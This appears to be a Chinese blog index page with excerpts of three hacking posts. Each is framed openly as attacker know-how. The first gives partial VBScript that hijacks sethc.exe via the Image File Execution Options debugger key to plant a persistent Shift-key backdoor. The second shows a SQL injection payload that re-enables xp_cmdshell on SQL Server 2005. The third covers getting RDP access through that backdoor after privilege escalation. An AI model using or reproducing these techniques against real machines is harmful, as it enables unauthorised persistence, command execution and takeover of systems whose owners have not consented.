天黑再动手

摘要： 大家都知道Shift后门对应的文件为：sethc.exe只要把sethc.exe挟持，别人就删不掉了。程序代码：Set WshShell = WScript.CreateObject("WScript.Shell")WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\debugger",WScript.CreateObject("WScript.shell 阅读全文

摘要： SQL Server 阻止了对组件 ‘xp_cmdshell’ 的 过程’sys.xp_cmdshell’的访问，因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用‘xp_cmdshell’。有关启用‘xp_cmdshell’ 的详细信息，请参阅 SQL Server 联机丛书中的“外围应用配置器”。SQL2005 在默认的设置中是删除了 XP_CMDSHELL的，因此也在注射过程中产生了点困难。后来经过查看MSSQL2005的手册才知道情况原来如此：用下面一句话就可以了解决了。 ;EXEC sp_configure ‘show advan 阅读全文

摘要： 遇到一个问题，提权成功 用户加入了 administrators Remote Desktop Users 两个组，3389登录提示有问题相信有少部分朋友遇到过这种问题，而我是第一次遇到，现在以经解决，首先，我是建立了SHIFT后门，进去以后在如下操作。处理办法:1. "控制面板" --> "管理工具" --> "终端服务配置"2. 点击"连接", 右边出现连接项(例如: RDP-Tcp,tcp,Microsoft RDP 5.2)3. 双击要修改的连接项。3. 弹出窗口, 单击"权限&quo 阅读全文